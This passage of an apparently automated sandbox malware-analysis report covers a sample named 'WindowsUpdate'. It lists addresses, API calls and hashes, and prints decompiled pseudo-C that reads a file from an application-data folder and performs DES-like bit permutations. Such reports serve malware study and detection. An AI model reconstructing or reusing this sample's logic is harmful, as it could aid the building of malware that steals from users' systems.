                                                                                                                    0x0032acbb
                                                                                                                    0x0032acbd
                                                                                                                    0x0032aea8
                                                                                                                    0x0032aea8
                                                                                                                    0x0032aea9
                                                                                                                    0x0032aeaa
                                                                                                                    0x0032aeab
                                                                                                                    0x0032aeac
                                                                                                                    0x0032aead
                                                                                                                    0x0032aeb2
                                                                                                                    0x0032aeb3
                                                                                                                    0x0032aeb4
                                                                                                                    0x0032aeb5
                                                                                                                    0x0032aeb6
                                                                                                                    0x0032aeb7
                                                                                                                    0x0032aeb8
                                                                                                                    0x0032aeb9
                                                                                                                    0x0032aeba
                                                                                                                    0x0032aec0
                                                                                                                    0x0032aec0
                                                                                                                    0x0032aec2
                                                                                                                    0x0032aec4
                                                                                                                    0x0032aec4
                                                                                                                    0x0032aecd
                                                                                                                    0x0032aed0
                                                                                                                    0x0032aed4
                                                                                                                    0x0032aed4
                                                                                                                    0x0032aedc
                                                                                                                    0x0032aedc
                                                                                                                    0x0032aede
                                                                                                                    0x0032aee0
                                                                                                                    0x0032aee0
                                                                                                                    0x0032aee5
                                                                                                                    0x0032aee9
                                                                                                                    0x0032aeec
                                                                                                                    0x0032aef0
                                                                                                                    0x0032aef0
                                                                                                                    0x0032aef4
                                                                                                                    0x0032aef4
                                                                                                                    0x0032aef6
                                                                                                                    0x0032af10
                                                                                                                    0x0032af12
                                                                                                                    0x0032af16
                                                                                                                    0x0032af1a
                                                                                                                    0x0032af1e
                                                                                                                    0x0032af20
                                                                                                                    0x0032af22
                                                                                                                    0x0032af24
                                                                                                                    0x0032af26
                                                                                                                    0x0032af26
                                                                                                                    0x0032af26
                                                                                                                    0x0032af2a
                                                                                                                    0x0032af2c
                                                                                                                    0x0032af34
                                                                                                                    0x0032af38
                                                                                                                    0x0032af3a
                                                                                                                    0x0032af3a
                                                                                                                    0x0032af3c
                                                                                                                    0x0032af4c
                                                                                                                    0x0032af4c
                                                                                                                    0x0032af4c
                                                                                                                    0x0032af3e
                                                                                                                    0x0032af3e
                                                                                                                    0x0032af42
                                                                                                                    0x00000000
                                                                                                                    0x0032af44
                                                                                                                    0x0032af44
                                                                                                                    0x0032af46
                                                                                                                    0x0032af4a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0032af4a
                                                                                                                    0x0032af44
                                                                                                                    0x0032af42
                                                                                                                    0x0032af4d
                                                                                                                    0x0032af4f
                                                                                                                    0x0032aef8
                                                                                                                    0x0032af0a
                                                                                                                    0x0032af0c
                                                                                                                    0x0032af51
                                                                                                                    0x0032af52
                                                                                                                    0x0032af56
                                                                                                                    0x0032af58
                                                                                                                    0x0032af58
                                                                                                                    0x0032af5e
                                                                                                                    0x0032acc3
                                                                                                                    0x0032acc7
                                                                                                                    0x0032accd
                                                                                                                    0x0032accf
                                                                                                                    0x00000000
                                                                                                                    0x0032acd5
                                                                                                                    0x0032acd9
                                                                                                                    0x0032acdf
                                                                                                                    0x0032ace1
                                                                                                                    0x00000000
                                                                                                                    0x0032ace7
                                                                                                                    0x0032ace7
                                                                                                                    0x0032acea
                                                                                                                    0x0032acec
                                                                                                                    0x0032acee
                                                                                                                    0x0032ad5e
                                                                                                                    0x0032ad60
                                                                                                                    0x0032ad67
                                                                                                                    0x0032ad69
                                                                                                                    0x0032ad6f
                                                                                                                    0x0032ad72
                                                                                                                    0x0032ada1
                                                                                                                    0x0032ada3
                                                                                                                    0x0032ada9
                                                                                                                    0x0032adab
                                                                                                                    0x0032adac
                                                                                                                    0x0032adae
                                                                                                                    0x0032ad74
                                                                                                                    0x0032ad74
                                                                                                                    0x0032ad75
                                                                                                                    0x0032ad7b
                                                                                                                    0x0032ad7d
                                                                                                                    0x00000000
                                                                                                                    0x0032ad7f
                                                                                                                    0x0032ad85
                                                                                                                    0x0032ad8c
                                                                                                                    0x0032ad93
                                                                                                                    0x0032ad96
                                                                                                                    0x0032ad98
                                                                                                                    0x0032ad9a
                                                                                                                    0x0032ad9d
                                                                                                                    0x0032ad9d
                                                                                                                    0x0032ad7d
                                                                                                                    0x0032adb6
                                                                                                                    0x0032adbb
                                                                                                                    0x0032adbd
                                                                                                                    0x0032adbf
                                                                                                                    0x0032adc1
                                                                                                                    0x0032adc4
                                                                                                                    0x0032adc7
                                                                                                                    0x0032adc9
                                                                                                                    0x0032adc9
                                                                                                                    0x0032adcc
                                                                                                                    0x0032adce
                                                                                                                    0x0032add0
                                                                                                                    0x0032add1
                                                                                                                    0x0032add2
                                                                                                                    0x0032addc
                                                                                                                    0x0032adde
                                                                                                                    0x0032ade1
                                                                                                                    0x0032ade5
                                                                                                                    0x0032ade9
                                                                                                                    0x0032adee
                                                                                                                    0x0032adf1
                                                                                                                    0x0032adf3
                                                                                                                    0x0032adf5
                                                                                                                    0x0032adf8
                                                                                                                    0x0032adfb
                                                                                                                    0x0032adfe
                                                                                                                    0x0032adfe
                                                                                                                    0x0032ae01
                                                                                                                    0x0032ae03
                                                                                                                    0x0032ae05
                                                                                                                    0x0032ae06
                                                                                                                    0x0032ae07
                                                                                                                    0x0032ae11
                                                                                                                    0x0032ae13
                                                                                                                    0x0032ae16
                                                                                                                    0x0032ae1a
                                                                                                                    0x0032ae1e
                                                                                                                    0x0032ae23
                                                                                                                    0x0032ae26
                                                                                                                    0x0032ae28
                                                                                                                    0x0032ae2a
                                                                                                                    0x0032ae2d
                                                                                                                    0x0032ae30
                                                                                                                    0x0032ae33
                                                                                                                    0x0032ae33
                                                                                                                    0x0032ae36
                                                                                                                    0x0032ae38
                                                                                                                    0x0032ae3a
                                                                                                                    0x0032ae3b
                                                                                                                    0x0032ae3c
                                                                                                                    0x0032ae41
                                                                                                                    0x0032ae43
                                                                                                                    0x0032ae45
                                                                                                                    0x0032ae72
                                                                                                                    0x0032ae7a
                                                                                                                    0x0032ae7d
                                                                                                                    0x0032ae80
                                                                                                                    0x0032ae83
                                                                                                                    0x0032ae86
                                                                                                                    0x0032ae89
                                                                                                                    0x0032ae8b
                                                                                                                    0x00000000
                                                                                                                    0x0032ae8d
                                                                                                                    0x0032ae90
                                                                                                                    0x0032ae93
                                                                                                                    0x0032ae99
                                                                                                                    0x0032ae9c
                                                                                                                    0x0032ae9f
                                                                                                                    0x0032ae9f
                                                                                                                    0x0032ae47
                                                                                                                    0x0032ae47
                                                                                                                    0x0032ae4d
                                                                                                                    0x0032ae54
                                                                                                                    0x0032ae55
                                                                                                                    0x0032ae58
                                                                                                                    0x0032ae58
                                                                                                                    0x0032ae58
                                                                                                                    0x0032ae5b
                                                                                                                    0x0032ae5e
                                                                                                                    0x0032ae5e
                                                                                                                    0x0032ae5e
                                                                                                                    0x0032ae5e
                                                                                                                    0x0032ae49
                                                                                                                    0x0032ae49
                                                                                                                    0x0032ae4b
                                                                                                                    0x0032ae68
                                                                                                                    0x0032ae6a
                                                                                                                    0x0032ae6c
                                                                                                                    0x00000000
                                                                                                                    0x0032ae6e
                                                                                                                    0x0032ae6e
                                                                                                                    0x0032ae70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0032ae70
                                                                                                                    0x0032ae6c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0032ae4b
                                                                                                                    0x0032ae47
                                                                                                                    0x00000000
                                                                                                                    0x0032ae45
                                                                                                                    0x0032acf0
                                                                                                                    0x0032acf0
                                                                                                                    0x0032acfa
                                                                                                                    0x0032acfd
                                                                                                                    0x0032ad04
                                                                                                                    0x0032ad07
                                                                                                                    0x0032ad0a
                                                                                                                    0x0032ad0d
                                                                                                                    0x0032ad14
                                                                                                                    0x0032ad16
                                                                                                                    0x0032ad1c
                                                                                                                    0x0032ad1f
                                                                                                                    0x0032ae61
                                                                                                                    0x0032ae61
                                                                                                                    0x0032ad25
                                                                                                                    0x0032ad25
                                                                                                                    0x0032ad26
                                                                                                                    0x0032ad2c
                                                                                                                    0x0032ad2e
                                                                                                                    0x00000000
                                                                                                                    0x0032ad34
                                                                                                                    0x0032ad37
                                                                                                                    0x0032ad38
                                                                                                                    0x0032ad3f
                                                                                                                    0x0032ad43
                                                                                                                    0x0032ad4a
                                                                                                                    0x0032ad4c
                                                                                                                    0x0032ad52
                                                                                                                    0x00000000
                                                                                                                    0x0032ad52
                                                                                                                    0x0032ad4c
                                                                                                                    0x0032ad2e
                                                                                                                    0x0032ad1f
                                                                                                                    0x0032acf2
                                                                                                                    0x0032acf2
                                                                                                                    0x0032acf8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0032acf8
                                                                                                                    0x0032acf0
                                                                                                                    0x00000000
                                                                                                                    0x0032acee
                                                                                                                    0x0032ace1
                                                                                                                    0x0032accf
                                                                                                                    0x0032aca2
                                                                                                                    0x0032aca2
                                                                                                                    0x00000000
                                                                                                                    0x0032aca4
                                                                                                                    0x0032aca4
                                                                                                                    0x0032acaa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0032acaa
                                                                                                                    0x0032aca2
                                                                                                                    0x0032ac88
                                                                                                                    0x0032ac88
                                                                                                                    0x0032ac8e
                                                                                                                    0x0032ac8e
                                                                                                                    0x0032ac95
                                                                                                                    0x0032ac96
                                                                                                                    0x00000000
                                                                                                                    0x0032ac8a
                                                                                                                    0x0032ac8a
                                                                                                                    0x0032ac8c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0032ac8c
                                                                                                                    0x0032ac88
                                                                                                                    0x0032ac86
                                                                                                                    0x0032ac56
                                                                                                                    0x0032ac56
                                                                                                                    0x0032ac56
                                                                                                                    0x0032ac5d
                                                                                                                    0x0032ac5e
                                                                                                                    0x0032ac60
                                                                                                                    0x0032ac65
                                                                                                                    0x0032ac65
                                                                                                                    0x0032ac67
                                                                                                                    0x0032ac6b
                                                                                                                    0x0032ac6b

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0032AC74
                                                                                                                      • Part of subcall function 0032C705: __getptd_noexit.LIBCMT ref: 0032C705
                                                                                                                    • __gmtime64_s.LIBCMT ref: 0032AD0D
                                                                                                                    • __gmtime64_s.LIBCMT ref: 0032AD43
                                                                                                                    • __gmtime64_s.LIBCMT ref: 0032AD60
                                                                                                                    • __allrem.LIBCMT ref: 0032ADB6
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0032ADD2
                                                                                                                    • __allrem.LIBCMT ref: 0032ADE9
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0032AE07
                                                                                                                    • __allrem.LIBCMT ref: 0032AE1E
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0032AE3C
                                                                                                                    • __invoke_watson.LIBCMT ref: 0032AEAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 384356119-0
                                                                                                                    • Opcode ID: 061e06230a02595ce45d74f4eee52ed1261026100781bc018d12ab560f8f8926
                                                                                                                    • Instruction ID: c9e22954b730d4e2f007e88c446d7cb897a7d15dcc75c9a525209b222a5f71f8
                                                                                                                    • Opcode Fuzzy Hash: 061e06230a02595ce45d74f4eee52ed1261026100781bc018d12ab560f8f8926
                                                                                                                    • Instruction Fuzzy Hash: 5671FB72A00F36ABD7179E78EC81B6AB3A8BF40724F154639F410DB681E770DD418B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CF737 Relevance: 13.7, APIs: 9, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 67%
                                                                                                                    			E002CF737(intOrPtr _a4) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v524;
				char _v1044;
				char _v2068;
				signed int _v2072;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				signed int* _v2096;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t55;
				signed int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t83;
				signed int _t85;
				char _t86;
				signed int _t91;
				signed int _t96;
				signed int _t101;
				signed int _t106;
				signed int _t118;
				signed int _t123;
				signed int _t128;
				signed int _t133;
				signed int _t136;
				intOrPtr* _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t144;
				signed int _t154;
				signed int _t158;
				void* _t160;
				intOrPtr* _t161;
				intOrPtr* _t166;
				void* _t168;
				signed int _t172;
				signed int _t176;
				signed int _t178;
				intOrPtr* _t179;
				signed int _t180;
				signed int _t183;
				void* _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				void* _t195;
				intOrPtr* _t196;
				signed int* _t198;
				void* _t199;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t211;
				intOrPtr* _t212;
				signed int _t214;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t222;
				void* _t223;
				void* _t224;
				void* _t226;

				_v8 =  *0x481f80 ^ _t214;
				_v268 = 0;
				E00327C87( &_v267, 0, 0x103);
				_t217 = _t216 + 0xc;
				_t197 = 0;
				_t200 = 0;
				_t55 =  &_v524;
				if(_a4 != 0xf) {
					_push(0x471000);
				} else {
					_push(0x470fec);
				}
				_push(0x100);
				_push(_t55);
				E00327AF9();
				_t218 = _t217 + 0xc;
				_push( &_v268);
				_push(0);
				_push(0);
				_push(0x1a);
				_push(0);
				if( *0x470200() == 0) {
					E00327AF9( &_v1044, 0x208,  &_v268);
					E00327B4E( &_v1044, 0x208, 0x470790);
					E00327B4E( &_v1044, 0x208,  &_v524);
					E00327B4E( &_v1044, 0x208, 0x471010);
					_v2072 = _t200;
					_t71 = E0032928A( &_v2072,  &_v1044, 0x470890);
					_t219 = _t218 + 0x3c;
					__eflags = _t71;
					if(_t71 != 0) {
						goto L5;
					} else {
						_t74 = _v2072;
						__eflags = _t74;
						if(__eflags == 0) {
							goto L5;
						} else {
							_push(_t74);
							_push(0x400);
							_push( &_v2068);
							_t76 = E00329087(_t160, _t197, _t200, __eflags);
							_t220 = _t219 + 0xc;
							__eflags = _t76;
							if(__eflags == 0) {
								L30:
								E00329010(_t160, _t197, _t200, __eflags);
								__eflags = _v8 ^ _t214;
								return E003272F2(_t197, _t160, _v8 ^ _t214, _t183, _t197, _t200, _v2072);
							} else {
								do {
									E00328317( &_v2068, 0x400);
									_t222 = _t220 + 8;
									__eflags = _t200;
									if(_t200 != 0) {
										_t83 = E00328487( &_v2068, 0x471030);
										_t223 = _t222 + 8;
										__eflags = _t83;
										if(__eflags != 0) {
											_t85 = E00328487( &_v2068, 0x471038);
											_t224 = _t223 + 8;
											__eflags = _t85;
											if(_t85 != 0) {
												 *_t85 = 0x5c;
											}
											_t166 =  &_v2068;
											_t184 = _t166 + 1;
											do {
												_t86 =  *_t166;
												_t166 = _t166 + 1;
												__eflags = _t86;
											} while (_t86 != 0);
											_t168 = _t166 - _t184 - 1;
											__eflags = _t168 - 0x400;
											if(_t168 >= 0x400) {
												E00327EEC();
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t214);
												_push(_t200);
												_push(_t197);
												_t198 = _v2096;
												_t201 = _t198[1];
												_t185 =  *_t198;
												_t91 = (_t201 >> 0x00000004 ^ _t185) & 0x0f0f0f0f;
												_t186 = _t185 ^ _t91;
												_t202 = _t201 ^ _t91 << 0x00000004;
												_t96 = (_t186 >> 0x00000010 ^ _t202) & 0x0000ffff;
												_t203 = _t202 ^ _t96;
												_t187 = _t186 ^ _t96 << 0x00000010;
												_t101 = (_t203 >> 0x00000002 ^ _t187) & 0x33333333;
												_t188 = _t187 ^ _t101;
												_t204 = _t203 ^ _t101 << 0x00000002;
												_t106 = (_t188 >> 0x00000008 ^ _t204) & 0x00ff00ff;
												_t205 = _t204 ^ _t106;
												_t189 = _t188 ^ _t106 << 0x00000008;
												_t172 = (_t205 >> 0x00000001 ^ _t189) & 0x55555555;
												 *_t198 = _t172 ^ _t189;
												_t198[1] = _t172 + _t172 ^ _t205;
												E002CFFF7(_t198, _v2084, 0);
												E002CFFF7(_t198, _v2088, 1);
												E002CFFF7(_t198, _v2092, 0);
												_t206 = _t198[1];
												_t190 =  *_t198;
												_t118 = (_t206 >> 0x00000001 ^ _t190) & 0x55555555;
												_t191 = _t190 ^ _t118;
												_t207 = _t206 ^ _t118 + _t118;
												_t123 = (_t191 >> 0x00000008 ^ _t207) & 0x00ff00ff;
												_t208 = _t207 ^ _t123;
												_t192 = _t191 ^ _t123 << 0x00000008;
												_t128 = (_t208 >> 0x00000002 ^ _t192) & 0x33333333;
												_t193 = _t192 ^ _t128;
												_t209 = _t208 ^ _t128 << 0x00000002;
												_t133 = (_t193 >> 0x00000010 ^ _t209) & 0x0000ffff;
												_t210 = _t209 ^ _t133;
												_t194 = _t193 ^ _t133 << 0x00000010;
												_t176 = (_t210 >> 0x00000004 ^ _t194) & 0x0f0f0f0f;
												_t136 = _t176 ^ _t194;
												_t178 = _t176 << 0x00000004 ^ _t210;
												__eflags = _t178;
												 *_t198 = _t136;
												_t198[1] = _t178;
												return _t136;
											} else {
												_push(_t160);
												 *((char*)(_t214 + _t168 - 0x810)) = _t86;
												_t138 = E00328487( &_v2068, 0x47103c);
												_t179 =  &_v268;
												_t226 = _t224 + 8;
												_t161 = _t138;
												_t32 = _t179 + 1; // 0x1
												_t195 = _t32;
												do {
													_t139 =  *_t179;
													_t179 = _t179 + 1;
													__eflags = _t139;
												} while (_t139 != 0);
												_t180 = _t179 - _t195;
												__eflags = _t180;
												_t196 =  &_v524;
												_t211 = _t196 + 1;
												do {
													_t140 =  *_t196;
													_t196 = _t196 + 1;
													__eflags = _t140;
												} while (_t140 != 0);
												_t183 = _t196 - _t211;
												__eflags = _t183;
												_t212 = _t161;
												_t35 = _t212 + 1; // 0x1
												_t199 = _t35;
												do {
													_t141 =  *_t212;
													_t212 = _t212 + 1;
													__eflags = _t141;
												} while (_t141 != 0);
												_t36 = _t180 + 3; // 0x4
												_t200 = _t212 - _t199 + _t36 + _t183;
												_t144 = E00327BCE(_t161, _t199, _t212 - _t199 + _t36 + _t183);
												_t197 = _t144;
												_t220 = _t226 + 4;
												__eflags = _t144;
												if(__eflags != 0) {
													E00327AF9(_t197, _t200,  &_v268);
													E00327B4E(_t197, _t200, 0x470790);
													E00327B4E(_t197, _t200,  &_v524);
													E00327B4E(_t197, _t200, 0x470790);
													_t39 = _t161 + 1; // 0x1
													E00327B4E(_t197, _t200, _t39);
													_t220 = _t220 + 0x3c;
												}
												_pop(_t160);
												goto L30;
											}
										} else {
											goto L14;
										}
									} else {
										_t158 = E00328487( &_v2068, 0x471020);
										_t223 = _t222 + 8;
										__eflags = _t158;
										if(__eflags != 0) {
											_t200 = 1;
										}
										goto L14;
									}
									goto L33;
									L14:
									_push(_v2072);
									_push(0x400);
									_push( &_v2068);
									_t154 = E00329087(_t160, _t197, _t200, __eflags);
									_t220 = _t223 + 0xc;
									__eflags = _t154;
								} while (__eflags != 0);
								E00329010(_t160, _t197, _t200, __eflags);
								__eflags = _v8 ^ _t214;
								return E003272F2(_t197, _t160, _v8 ^ _t214, _t183, _t197, _t200, _v2072);
							}
						}
					}
				} else {
					 *0x470124();
					L5:
					return E003272F2(0, _t160, _v8 ^ _t214, _t183, _t197, _t200);
				}
				L33:
			}
























































































                                                                                                                    0x002cf747
                                                                                                                    0x002cf75a
                                                                                                                    0x002cf761
                                                                                                                    0x002cf766
                                                                                                                    0x002cf769
                                                                                                                    0x002cf76b
                                                                                                                    0x002cf771
                                                                                                                    0x002cf777
                                                                                                                    0x002cf780
                                                                                                                    0x002cf779
                                                                                                                    0x002cf779
                                                                                                                    0x002cf779
                                                                                                                    0x002cf785
                                                                                                                    0x002cf78a
                                                                                                                    0x002cf78b
                                                                                                                    0x002cf790
                                                                                                                    0x002cf799
                                                                                                                    0x002cf79a
                                                                                                                    0x002cf79c
                                                                                                                    0x002cf79e
                                                                                                                    0x002cf7a0
                                                                                                                    0x002cf7aa
                                                                                                                    0x002cf7d7
                                                                                                                    0x002cf7ed
                                                                                                                    0x002cf805
                                                                                                                    0x002cf81b
                                                                                                                    0x002cf833
                                                                                                                    0x002cf839
                                                                                                                    0x002cf83e
                                                                                                                    0x002cf841
                                                                                                                    0x002cf843
                                                                                                                    0x00000000
                                                                                                                    0x002cf849
                                                                                                                    0x002cf849
                                                                                                                    0x002cf84f
                                                                                                                    0x002cf851
                                                                                                                    0x00000000
                                                                                                                    0x002cf857
                                                                                                                    0x002cf857
                                                                                                                    0x002cf85e
                                                                                                                    0x002cf863
                                                                                                                    0x002cf864
                                                                                                                    0x002cf869
                                                                                                                    0x002cf86c
                                                                                                                    0x002cf86e
                                                                                                                    0x002cf9e9
                                                                                                                    0x002cf9ef
                                                                                                                    0x002cf9fd
                                                                                                                    0x002cfa08
                                                                                                                    0x002cf877
                                                                                                                    0x002cf877
                                                                                                                    0x002cf883
                                                                                                                    0x002cf888
                                                                                                                    0x002cf891
                                                                                                                    0x002cf893
                                                                                                                    0x002cf8b4
                                                                                                                    0x002cf8b9
                                                                                                                    0x002cf8bc
                                                                                                                    0x002cf8be
                                                                                                                    0x002cf90a
                                                                                                                    0x002cf90f
                                                                                                                    0x002cf912
                                                                                                                    0x002cf914
                                                                                                                    0x002cf916
                                                                                                                    0x002cf916
                                                                                                                    0x002cf919
                                                                                                                    0x002cf91f
                                                                                                                    0x002cf927
                                                                                                                    0x002cf927
                                                                                                                    0x002cf929
                                                                                                                    0x002cf92a
                                                                                                                    0x002cf92a
                                                                                                                    0x002cf930
                                                                                                                    0x002cf931
                                                                                                                    0x002cf937
                                                                                                                    0x002cfa09
                                                                                                                    0x002cfa0e
                                                                                                                    0x002cfa0f
                                                                                                                    0x002cfa10
                                                                                                                    0x002cfa11
                                                                                                                    0x002cfa12
                                                                                                                    0x002cfa13
                                                                                                                    0x002cfa14
                                                                                                                    0x002cfa15
                                                                                                                    0x002cfa16
                                                                                                                    0x002cfa17
                                                                                                                    0x002cfa1a
                                                                                                                    0x002cfa1b
                                                                                                                    0x002cfa1c
                                                                                                                    0x002cfa21
                                                                                                                    0x002cfa24
                                                                                                                    0x002cfa2d
                                                                                                                    0x002cfa32
                                                                                                                    0x002cfa37
                                                                                                                    0x002cfa40
                                                                                                                    0x002cfa45
                                                                                                                    0x002cfa4a
                                                                                                                    0x002cfa53
                                                                                                                    0x002cfa58
                                                                                                                    0x002cfa5d
                                                                                                                    0x002cfa69
                                                                                                                    0x002cfa6e
                                                                                                                    0x002cfa73
                                                                                                                    0x002cfa7b
                                                                                                                    0x002cfa85
                                                                                                                    0x002cfa8d
                                                                                                                    0x002cfa90
                                                                                                                    0x002cfa9b
                                                                                                                    0x002cfaa6
                                                                                                                    0x002cfaab
                                                                                                                    0x002cfaae
                                                                                                                    0x002cfab6
                                                                                                                    0x002cfabb
                                                                                                                    0x002cfabf
                                                                                                                    0x002cfac8
                                                                                                                    0x002cfacd
                                                                                                                    0x002cfad2
                                                                                                                    0x002cfadb
                                                                                                                    0x002cfae0
                                                                                                                    0x002cfae5
                                                                                                                    0x002cfaf1
                                                                                                                    0x002cfaf6
                                                                                                                    0x002cfafb
                                                                                                                    0x002cfb04
                                                                                                                    0x002cfb0c
                                                                                                                    0x002cfb11
                                                                                                                    0x002cfb11
                                                                                                                    0x002cfb13
                                                                                                                    0x002cfb15
                                                                                                                    0x002cfb1b
                                                                                                                    0x002cf93d
                                                                                                                    0x002cf93d
                                                                                                                    0x002cf93e
                                                                                                                    0x002cf951
                                                                                                                    0x002cf956
                                                                                                                    0x002cf95c
                                                                                                                    0x002cf95f
                                                                                                                    0x002cf961
                                                                                                                    0x002cf961
                                                                                                                    0x002cf967
                                                                                                                    0x002cf967
                                                                                                                    0x002cf969
                                                                                                                    0x002cf96a
                                                                                                                    0x002cf96a
                                                                                                                    0x002cf96e
                                                                                                                    0x002cf96e
                                                                                                                    0x002cf970
                                                                                                                    0x002cf976
                                                                                                                    0x002cf979
                                                                                                                    0x002cf979
                                                                                                                    0x002cf97b
                                                                                                                    0x002cf97c
                                                                                                                    0x002cf97c
                                                                                                                    0x002cf980
                                                                                                                    0x002cf980
                                                                                                                    0x002cf982
                                                                                                                    0x002cf984
                                                                                                                    0x002cf984
                                                                                                                    0x002cf987
                                                                                                                    0x002cf987
                                                                                                                    0x002cf989
                                                                                                                    0x002cf98a
                                                                                                                    0x002cf98a
                                                                                                                    0x002cf98e
                                                                                                                    0x002cf995
                                                                                                                    0x002cf998
                                                                                                                    0x002cf99d
                                                                                                                    0x002cf99f
                                                                                                                    0x002cf9a2
                                                                                                                    0x002cf9a4
                                                                                                                    0x002cf9af
                                                                                                                    0x002cf9bb
                                                                                                                    0x002cf9c9
                                                                                                                    0x002cf9d5
                                                                                                                    0x002cf9da
                                                                                                                    0x002cf9e0
                                                                                                                    0x002cf9e5
                                                                                                                    0x002cf9e5
                                                                                                                    0x002cf9e8
                                                                                                                    0x00000000
                                                                                                                    0x002cf9e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002cf895
                                                                                                                    0x002cf89b
                                                                                                                    0x002cf8a0
                                                                                                                    0x002cf8a3
                                                                                                                    0x002cf8a5
                                                                                                                    0x002cf8a7
                                                                                                                    0x002cf8a7
                                                                                                                    0x00000000
                                                                                                                    0x002cf8a5
                                                                                                                    0x00000000
                                                                                                                    0x002cf8c0
                                                                                                                    0x002cf8c0
                                                                                                                    0x002cf8cc
                                                                                                                    0x002cf8d1
                                                                                                                    0x002cf8d2
                                                                                                                    0x002cf8d7
                                                                                                                    0x002cf8da
                                                                                                                    0x002cf8da
                                                                                                                    0x002cf8e4
                                                                                                                    0x002cf8f3
                                                                                                                    0x002cf8fd
                                                                                                                    0x002cf8fd
                                                                                                                    0x002cf86e
                                                                                                                    0x002cf851
                                                                                                                    0x002cf7ac
                                                                                                                    0x002cf7ac
                                                                                                                    0x002cf7b3
                                                                                                                    0x002cf7c3
                                                                                                                    0x002cf7c3
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _strstr$_fgets$__wfopen_s_malloc_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2443066643-0
                                                                                                                    • Opcode ID: cbc4664109ca34017ed911d0200bcaa0e92c1a35e4de850bbb2a854da42b782f
                                                                                                                    • Instruction ID: 011f05ead3533e754039b07bda6f4a812c56478fb93c04a8843087121bbb07c9
                                                                                                                    • Opcode Fuzzy Hash: cbc4664109ca34017ed911d0200bcaa0e92c1a35e4de850bbb2a854da42b782f
                                                                                                                    • Instruction Fuzzy Hash: 8D713F7190022D6ACF61EF609D46FEE736DBF01304F1485FAF948EB141EE719A858BA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002D3D37 Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 54%
                                                                                                                    			E002D3D37(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v140;
				char _v156;
				intOrPtr _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				void* _t29;
				intOrPtr _t48;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				signed int _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t65;

				_t56 = __edx;
				_v8 =  *0x481f80 ^ _t60;
				_v160 = _a16;
				_t21 = E002E4587(_t57, _a8);
				_t48 =  *0x48707c;
				_t62 = _t61 + 4;
				_t59 = _t21;
				if(_t48 == 0) {
					_v156 = 0x94;
					 *0x470118( &_v156);
					_t48 = (0 | _v140 == 0x00000002) + 1;
					 *0x48707c = _t48;
				}
				_push(0);
				_push(0);
				_push(0);
				_push(_t59);
				if(_t48 != 2) {
					_t13 =  *0x4700c0() + 3; // 0x3
					_t46 = _t13;
					_t58 = E00327BCE(_t46, _t57, _t46);
					_t63 = _t62 + 4;
					if(_t58 == 0) {
						goto L4;
					} else {
